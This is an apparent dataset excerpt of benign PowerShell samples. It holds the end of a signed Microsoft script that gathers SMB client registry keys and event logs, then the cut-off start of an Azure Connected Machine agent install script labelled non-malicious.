CollectFiles -filesToCollect $OutputFile -fileDescription "SMB Client Information from Net.exe" -SectionDescription $sectionDescription #----------Registry $OutputFile= $Computername + "_SmbClient_reg_output.TXT" $CurrentVersionKeys = "HKLM\SYSTEM\CurrentControlSet\services\LanManWorkstation", "HKLM\SYSTEM\CurrentControlSet\services\lmhosts", "HKLM\SYSTEM\CurrentControlSet\services\MrxSmb", "HKLM\SYSTEM\CurrentControlSet\services\MrxSmb10", "HKLM\SYSTEM\CurrentControlSet\services\MrxSmb20", "HKLM\SYSTEM\CurrentControlSet\services\MUP", "HKLM\SYSTEM\CurrentControlSet\services\NetBIOS", "HKLM\SYSTEM\CurrentControlSet\services\NetBT", "HKCU\Network", "HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider", "HKLM\SYSTEM\CurrentControlSet\services\Rdbss", "HKLM\SYSTEM\CurrentControlSet\Control\SMB", "HKLM\SYSTEM\CurrentControlSet\Control\Computername", "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" RegQuery -RegistryKeys $CurrentVersionKeys -Recursive $true -OutputFile $OutputFile -fileDescription "SMB Client registry output" -SectionDescription $sectionDescription #W8/WS2012 and later if ($bn -gt 9000) { #----------SMBClient / Operational $sectionDescription = "SMBClient EventLogs" $EventLogNames = "Microsoft-Windows-SMBClient/Connectivity", "Microsoft-Windows-SMBClient/Operational", "Microsoft-Windows-SMBClient/Security", "Microsoft-Windows-SMBWitnessClient/Admin", "Microsoft-Windows-SMBWitnessClient/Informational", "Microsoft-Windows-SMBClient/Audit", "Microsoft-Windows-SMBClient/Diagnostic", "Microsoft-Windows-SMBClient/HelperClassDiagnostic", "Microsoft-Windows-SMBClient/ObjectStateDiagnostic", "Microsoft-Windows-SMBClient/XperfAnalytic" $Prefix = "" $Suffix = "_evt_" .\TS_GetEvents.ps1 -EventLogNames $EventLogNames -SectionDescription $sectionDescription -Prefix $Prefix -Suffix $Suffix } # SIG # Begin signature block # MIIoOQYJKoZIhvcNAQcCoIIoKjCCKCYCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB1E7UyCTZz+Vvi # GRH1HazoeIb4RtUDptH4dYcwdztPtKCCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIL9F # Nd4LVWoAgHKhm4RJTE+wcbQJDJz82GlUWfCgNxYgMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAUKw52zS8PzW+jSEqxoJ/QSjqwPmNIEsg/XnC # PNzKad1+6Zb1oBn2Taj1Mj2W7BZm73PIGH2BJZwlgx3T5YDfBAww1N/dRAqiM5Ar # rhXX/SRu2srHgY8EEbrHDtiBh73S2V7fzAQoSQ2T3SZZj/VkuWvax9MNkjrVURv6 # Lk0slu172vreBcvsYkWnp40bJTXmY84jiiA2mlAu8xb3LsKZppKmL0GM43Zus8Kh # JfEDMkxdDWVTD/ryN1alzm3dVoXArZDlTrsS9GkUQGjafUteANoUOD7697EYtCX6 # QaF+6e6wjuS9KmP2z/VY2sAf1/NNbG2eYpE/HQQN8Cwx59mOeaGCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCDpGO8P7IFP1JTlV7bLZll0ZN/uxdvA+PkG # 9c06jBMxBQIGZxp6XqTbGBMyMDI0MTAyODExNDA0My4yODlaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046QTAwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAevgGGy1tu847QAB # AAAB6zANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MzRaFw0yNTAzMDUxODQ1MzRaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTAwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDBFWgh2lbgV3eJp01oqiaF # BuYbNc7hSKmktvJ15NrB/DBboUow8WPOTPxbn7gcmIOGmwJkd+TyFx7KOnzrxnoB # 3huvv91fZuUugIsKTnAvg2BU/nfN7Zzn9Kk1mpuJ27S6xUDH4odFiX51ICcKl6EG # 4cxKgcDAinihT8xroJWVATL7p8bbfnwsc1pihZmcvIuYGnb1TY9tnpdChWr9EARu # Co3TiRGjM2Lp4piT2lD5hnd3VaGTepNqyakpkCGV0+cK8Vu/HkIZdvy+z5EL3ojT # dFLL5vJ9IAogWf3XAu3d7SpFaaoeix0e1q55AD94ZwDP+izqLadsBR3tzjq2RfrC # NL+Tmi/jalRto/J6bh4fPhHETnDC78T1yfXUQdGtmJ/utI/ANxi7HV8gAPzid9TY # jMPbYqG8y5xz+gI/SFyj+aKtHHWmKzEXPttXzAcexJ1EH7wbuiVk3sErPK9MLg1X # b6hM5HIWA0jEAZhKEyd5hH2XMibzakbp2s2EJQWasQc4DMaF1EsQ1CzgClDYIYG6 # rUhudfI7k8L9KKCEufRbK5ldRYNAqddr/ySJfuZv3PS3+vtD6X6q1H4UOmjDKdjo # W3qs7JRMZmH9fkFkMzb6YSzr6eX1LoYm3PrO1Jea43SYzlB3Tz84OvuVSV7NcidV # tNqiZeWWpVjfavR+Jj/JOQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFHSeBazWVcxu # 4qT9O5jT2B+qAerhMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCDdN8voPd8C+VW # ZP3+W87c/QbdbWK0sOt9Z4kEOWng7Kmh+WD2LnPJTJKIEaxniOct9wMgJ8yQywR8 # WHgDOvbwqdqsLUaM4NrertI6FI9rhjheaKxNNnBZzHZLDwlkL9vCEDe9Rc0dGSVd # 5Bg3CWknV3uvVau14F55ESTWIBNaQS9Cpo2Opz3cRgAYVfaLFGbArNcRvSWvSUbe # I2IDqRxC4xBbRiNQ+1qHXDCPn0hGsXfL+ynDZncCfszNrlgZT24XghvTzYMHcXio # LVYo/2Hkyow6dI7uULJbKxLX8wHhsiwriXIDCnjLVsG0E5bR82QgcseEhxbU2d1R # VHcQtkUE7W9zxZqZ6/jPmaojZgXQO33XjxOHYYVa/BXcIuu8SMzPjjAAbujwTawp # azLBv997LRB0ZObNckJYyQQpETSflN36jW+z7R/nGyJqRZ3HtZ1lXW1f6zECAeP+ # 9dy6nmcCrVcOqbQHX7Zr8WPcghHJAADlm5ExPh5xi1tNRk+i6F2a9SpTeQnZXP50 # w+JoTxISQq7vBij2nitAsSLaVeMqoPi+NXlTUNZ2NdtbFr6Iir9ZK9ufaz3FxfvD # Zo365vLOozmQOe/Z+pu4vY5zPmtNiVIcQnFy7JZOiZVDI5bIdwQRai2quHKJ6ltU # dsi3HjNnieuE72fT4eWhxtmnN5HYCDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkEwMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCABol1u1wwwYgUtUowMnqYvbul3qCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smV3jAi # GA8yMDI0MTAyODA0NDcyNloYDzIwMjQxMDI5MDQ0NzI2WjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyZXeAgEAMAcCAQACAiCYMAcCAQACAhOLMAoCBQDqyudeAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAEFghDjhxi2TSq7RRxDW8oDboQrB # l/FnL9GFyUGkxt5Hz/YPxhSGpJ8w4/Uc7LKfS5rtB+7Ou2rGzeojlAdVUArx1kj9 # 4wVSPeBrEy9PBwhiSqDWDINZjAa60rf5xjy9lMiQcK54bc21WGJa4ZlGC9qrcYoQ # pLqiwuYZS76Io7iSbtEhMY/0WpMko/8XFost2uITk8Hh2RjhtVnZ4rJ1N1+/2kZo # bq1RJX7cvC0OFH4gYrGgGJDLvaPbnwgdNz88IdYs1Nch8qdg7r8oBSko61ML576C # xdcnSGw9Vpf07jA/s0RmTcg81r/kwthHbYIWPw+cOA4BYp09eecPmASoKj8xggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAevg # GGy1tu847QABAAAB6zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCD4h0JuDMJYgqOiQ35tW5WI6zHk # e1nn5wNcQgO57W+1bzCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIM63a75f # aQPhf8SBDTtk2DSUgIbdizXsz76h1JdhLCz4MIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHr4BhstbbvOO0AAQAAAeswIgQgWXKlh2TC # sXUYprvY+OJSRQQYCPt99/x5xOK3eVkF+jEwDQYJKoZIhvcNAQELBQAEggIALH4P # DN9ndZr4Ph+62K8Gq8MRlwCys0kf+2t4ymc9dXFx4Hyl53Ym5i6nuCtoX5gsbbB4 # gZtp4TF1B2JPt7rgrAMdiyhJ0uFQS63mgV/gaMl5QKQYkHCQqgRBMkwkpF93QTyM # Zcaqr7YZY8pjJiHQzMBF/zdfOMsYni+3rZDuW6y2BtBtJw8ID7HmnzPB00fa+TcQ # tJJgtxgiB1TGMrx/cJ4TiJAvwQ/Z43aYQaMJy1pssBt3zE26/guBHqwJS9dOHrJt # geWUNraBiIsKHxPv0YRTM5eWDWWg1XnhXhWFWhTClspNj5w98/3FYWMEO/+sepL3 # oi0SyPuD2p33fduYm6NUqnmqWvKQDzu/Vmv03XEgmsNaxF73ISZmX1ACIWZGUqvs # 4gLBjUMC7C/0JpniYgY8Q4Rzpx6rbVR12BPHyrmypvDgaD5zqsQjuqwepE1MFTfK # LXxTCw4YrzwUWCt137na28tuxRne0YzaBsRDf3qjzvPLEIdWYhrkxTZl2HX6EFJk # EZEDGyjGKSoYdMGV3TmXIcJE8X/sGBr+sqU3DmTjJSuGxKA/cfqOtQFbtpLs3HLq # DllaPyBO1SkzZJHbgFlVZP1Y01F03uaMRu86ws3wTmdZQXgoahoPC8fFlgS3qblv # hm4EwyB8Oz01JpF67NqBQK6s7NHmdADvYeS6utM= # SIG # End signature block
combined_dataset/train/non-malicious/sample_32_90.ps1
sample_32_90.ps1
[CmdletBinding()] param ( [string]$OutFile, [string]$AltDownload, [string]$Proxy, [string]$AltHisEndpoint ) $ErrorActionPreference = 'Stop' $ProgressPreference = 'SilentlyContinue' $refVersion = [version] '4.5' $provider = 'Microsoft.HybridCompute' # Error codes used by azcmagent are in range of [0, 125]. # Installation scripts will use [127, 255]. Check install_linux_azcmagent.sh for the codes used for Linux script. $global:errorcode="AZCM0150" <# Throw a structured exception#> function Invoke-Failure { [CmdletBinding()] param( [Parameter(Mandatory=$true)] $Message, [Parameter(Mandatory=$true)] $ErrorCode, [Parameter(Mandatory=$false)] $Details ) $ex = new-object -TypeName System.Exception -ArgumentList @($Message) $ex.Data["Details"] = $details $ex.Data["ErrorCode"] = $errorcode throw $ex } function Test-AzureStackHCI() { [CmdletBinding()] param ( ) try { $product=Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName | select -ExpandProperty ProductName } catch { Write-Verbose -Message "Error $_ Unable to determine product SKU from registry" -Verbose # Will attempt to install anyway return $false } if ($product -eq 'Azure 